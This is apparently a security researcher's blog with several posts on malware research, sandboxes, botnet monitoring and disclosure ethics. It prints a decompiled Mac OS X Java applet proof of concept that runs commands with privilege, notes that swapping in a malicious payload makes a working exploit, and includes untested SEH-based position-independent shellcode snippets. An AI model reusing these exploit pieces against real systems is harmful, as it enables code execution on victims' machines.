Unresponsible Disclosure: The MacOS X Java Bug

Landon Fuller decided to publish a proof of concept for a Sun Java VM vulnerability, that is still unpatched on Mac OS X. I agree that after this timespan, it was neccessary to demonstrate how easy it is to exploit this vulnerability; however, he decided to make it trivial to build your own exploit from it.

You can easily fetch HelloWorldApplet.class from his page and look at a decompiled version by JAD. He uses his own loader package fun.FunLoader, so grab fun/FunLoader.class as well. HelloWorldApplet also uses javax/Exec.class and Exec$1.class, and if we decompile that, it is trivial to spot, how to craft your own exploit:

package javax;

import java.security.AccessController;
import java.security.PrivilegedExceptionAction;

public class Exec
{

    public Exec()
    {
        try
        {
            final String cmd[] = {
                "/usr/bin/say", "I am executing an innocuous user process"
            };
            AccessController.doPrivileged(new PrivilegedExceptionAction() {

                public Object run()
                    throws Exception
                {
                    Runtime.getRuntime().exec(cmd);
                    return null;
                }

                final String val$cmd[];
                final Exec this$0;

            
            {
                this$0 = Exec.this;
                cmd = as;
                super();
            }
            });
        }
        catch(Exception exception)
        {
            throw new RuntimeException("Exec failed", exception);
        }
    }
}

You can even recycle all .class files and his t.tmp serialized input stream, just replace Exec.class in your local copy with your malicious payload.

Now this is unresponsible disclosure if it is so dead-easy to build your own exploit from it, it's almost easier than writing a custom shellcode for an existing exploit.

libdasm D9h FPU Instructions Fix

libdasm incorrectly disassembles FPU instructions with D9 prefix and second byte > fnop. Affected instructions amongst others include fsin, fcos and frndint. The reason is simple, there is four NULL lines missing in the correspondending opcode table, resulting in an off-by-four for the following opcodes. I've sent a very simple patch to the libdasm author, until it is included in a release, it's here as well:

$ cat libdasm-1.5-fpufix-d9prefix.patch 
--- libdasm-1.5/opcode_tables.h 2006-02-21 15:29:41.000000000 +0100
+++ libdasm-1.5-fpufix/opcode_tables.h 2009-04-10 13:32:20.000000000 +0200
@@ -1818,6 +1818,10 @@
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
+ { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 
  { INSTRUCTION_TYPE_FPU,    "fchs",      FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 },
  { INSTRUCTION_TYPE_FPU,    "fabs",      FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 },
  { INSTRUCTION_TYPE_FPU,    NULL,        FLAGS_NONE,                  FLAGS_NONE,                FLAGS_NONE,   0, 0, 0, 0, 0 }, 

I've stumbled across this while trying to use my (pefile and pydasm based) code normalizer on a malware packer using float's for looping.

GovCERT.nl 2008 Slides

My GovCERT.nl 2008 slides are online now.

Spam, please

Please send me your spam or malware!

Anubis Sandbox Becoming Useless

Doing mostly botnet research with the samples we obtain through the mwcollect Alliance, the most interesting thing in the Anubis sandbox reports for me were the network traces. Following the lame ``run the binary in a VM, hooking all interesting APIs'' the Anubis sandbox has to really connect to the C&C server in order to get to know channel names, keys, etc.

The big problem here is, that the public online submission interface analysis machine all run on static IPs, not utilizing proxies and even worse -- having a valid reverse DNS entry pointing to Anubis. In the end, this made most ``advanced'' herders block the Anubis sandbox, as can be seen from this exemplary report (search for ``ERROR :Closing'').

Time to finally finish my own sandboxing stuff... not relying on the remote connection but on statical behavioural analysis with some emulation (packers, self-modifying code, ...).

mwcollect Alliance Webinterface

We're still working on the mwcollect Alliance Webinterface, but already got some really nice stuff. The people from the Anubis Sandbox were so kind to provide us with a closed submission interface, so we can automatically upload new samples and link to them.

Jikto Hype

After not posting for quite some time, I've got something to say again.

Recently, the Jikto `Javascript Drone' was hyped a lot in different media; the usual ``OMG t3h Internet is l0st'' we see at least once each year. I just had a look at Jikto's code, which was leaked the day after Jikto was presented on ShmooCon. It's totally ridiculous, it's using XMLHttpRequests to spider web-pages and tries finding `.old' and `.bak' files on these servers bug bruteforcing every found file. Additionally, it features a very false positive prone XSS scanner.

This XSS scanner injects <script>alert('xss');</script> into every GET parameter and just parses for `script' in the response. If the brackets are properly escaped, we still get our false positive. How enterprise.

Another wrong rumor is, that this code turns your computer or your browser into a drone. It's just yet another non-resident script. Additionally, because of the XMLHttpRequests, you're limited to your own domain to scan (unless you find a cool vulnerability in your browser or already know a XSS in the target site to inject Jikto).

All in all, this is just some hyped, lame, proof of concept script, if you ask me. :/

Update:
One of my favourite hypes regarding Jikto says ``the hacker tool Jikto is spreading uncontrolled'' and ``the script captures computers of clueless Internet users to perform a portscan''; ``security experts are afraid that blackhats could misuse the extremely dangerous potential of this software''.

Botnets? No real threat, not interesting to the media... Hey, there is already a cool botnet monitoring tool from Microsoft, featuring a laggy GUI and dieing if more than 2k nets are monitored. Hey, subfolders for each botnet are cool.
Seriously, let's just all commit suicide in such an IT security world. :/

New Sandbox Application on the Horizon

A new sandbox application has poppep up on the net: JoeBox. Of course it uses its own ``unique special concept''; the same unique special concept we were seeing in CWSandbox and some other private tools before.

It uses the same old userland API hooking tricks, everybody else seems to be using but this one runs on a physical machine and not in a virtual machine. Let's hope there is at least one bigger difference: this one could be free. But in the age of every company registering .org's like crazy, this will probably stay a dream.

Get EIP with SEH

While talking about shellcode detection with Paul and Markus, I remembered some SEH based code I've written some time ago for some code to be position independent (and obfuscated). Unfortunately, I couldn't find the original source anymore but wrote up, what I remembered (and didn't test it):

Snippet 1: Custom Handler

mov eax, [esp+0x10]
mov eax, [eax+0x0c]
push eax
jmp eax

Snippet 2: SEH Overwrite

mov edi, [fs:0]
mov edi, [edi+4]
mov [edi+0], 0x448b6766
mov [edi+4], 0x67661024
mov [edi+8], 0x660c408b
mov [edi+12], 0xe0ff6650
 
xor eax, eax
xor [eax], eax
 
pop eax

Basically, the second snippet fetches the address of the current top-most SEH, overwrites it with the binary version of the first snippet and triggers a general protection fault. The address is then popped. Of course, this only works on Win32.

At the time I `invented' that code, I didn't have any reference for such code ITW. But I'm pretty sure, I'm not the first one to have that idea (although a quick Google run didn't reveal anything to me).

HoneyBow v0.1.0 Release

The Chinese Honeynet Project just released their HoneyBow software at mwcollect.org. HoneyBow is an utility suite, built around a VMWare Windows honeypot to automatically detect infections by malware and extract the malware to submit it to a central G.O.T.E.K. server for aggregation.

VirusTotal.com

VirusTotal.com is a well-known multi-scanner interface, available for free via web upload. In order to be better comparable to other anti-virus scanners, EmsiSoft recently decided to ask them, to add their A-Squared engine (for free as well, of course). At first, nobody at Hispasec had any problems with this and they put them in the queue to be added (due to backend redesign, this lasted for weeks).

Then suddenly, Oliver Auerbach from Avira started to complain, just because he had some unsettled issues with one of the developers at EmsiSoft and therefore declared EmsiSoft as an untrustworthy corporation. Hispasec immediately reacted and rejected EmsiSoft.

Seems like VirusTotal.com is not that independent, as they always try to look like. This also fits into my image of them, distributing samples, even if you ask them not to do so. The little ``don't distribute'' button at the upload interface really seems useless, at least it was in 2005.

Back then, I was developing some proof of concept samples for the c't Magazine and tested them with VirusTotal.com. Since they were obfuscated and 0day, nobody of course detected them. A few weeks later, when the magazine wrote their article, Symantec and a couple of other scanners were detecting them (funnily enoguh as RBot variants, just because it was IRC proof of concept malware). The samples never left my harddrive, except for going to VT or to the magazine...

So be careful with VirusTotal.com (there is also an alternative, Jotti's Online Scanner).

Update: jcanto@hispasec.com informed me in a closed forum:

"This also fits into my image of them, distributing samples, even if you ask them not to do so."
Anybody in the sample distribution system knows this is simply a lie. Simply ask any person dealing with VT in that labs and you'll know it.

We don't distribute samples that are not detected by any engine. Besides that, Symantec is curiouslly the only company participating in VirusTotal that has never received a sample from us as they've never wanted it. We contacted repeated times with people at the company but never gave us an email to send that samples. I suppose they are not interested in them because they've enough with their sources.

I never said that Symantec was the only to detect it, though.

botsnoopd - Sniffing on Botnets

botsnoopd is a project I have now been working on for quite some time. Initially, it was invented as a replacement for the ShadowServer's snoop infrastructure. But now that I was so slow and they put so much effort into their Perl script, it seems they want to keep it. So we're now going to use this in the mwcollect Alliance.

We are going to have a three tier approach consisting of

• nepenthes / other G.O.T.E.K. inputs
• CWSandbox / Norman Sandbox / other analysis devices
• botsnoopd

to efficiently catch and collect malware, analyse it in regards of extracting botnet C&C information and then finally sniff the bot herders' commands and store them.

Although it seems there were some rumors on the Virus Bulletin 2006 hallways that botsnoopd has been publically released, that is definitely not true. People might have been refering to a presentation we have been giving at Blackhat: Georg Wicherski & Thorsten Holz: «Catching Malware to Detect, Track and Mitigate Botnets». botsnoopd is not finished software yet and as new transport protocols for C&C emerge, new modules will be created (it's the same story as with nepenthes).

It is not our plan to ever publically release it anyway, since it might be a powerful tool for bot herders as well, the current idea is to release it as opensource to selected parties under a NDA.

Future of the mwcollect Alliance

Tonight, I finally managed to fix the bug in the G.O.T.E.K. submission architecture for the mwcollect Alliance. It was caused by a threading dead-lock; the buggy code was accidently installed on the Alliance server when recompiling gotekd from SVN due to the upgrade from libmysqlclient14 to libmysqlclient15. Binaries are now flowing again.

The initial idea was to migrate to our new backend (featured by Postgres) as soon as possible, but as I learned at Blackhat 2006, some companies are now really relying on the service we offer (for free, as a hobby). This means our tiny little `we share what we have' project now evolved to a real business case.

Eventhough some developers now would go like `Ka-Ching!' and try to sell this, we are going to keep this service free. This has the obvious positive side that researchers can freely use our binaries, but the backside of this is that the service provided is not guaranteed to be constant or whatever. However, some companies now offered us to support us by monetary means to allow us to focus our work on this (as we all have real jobs with higher priority).

We hope to migrate to the new backend soon, an inofficial and pre-beta preview may be found at the new Alliance page. The roadmap is to be finished soon; whenever this is, speaking as a lazy .org.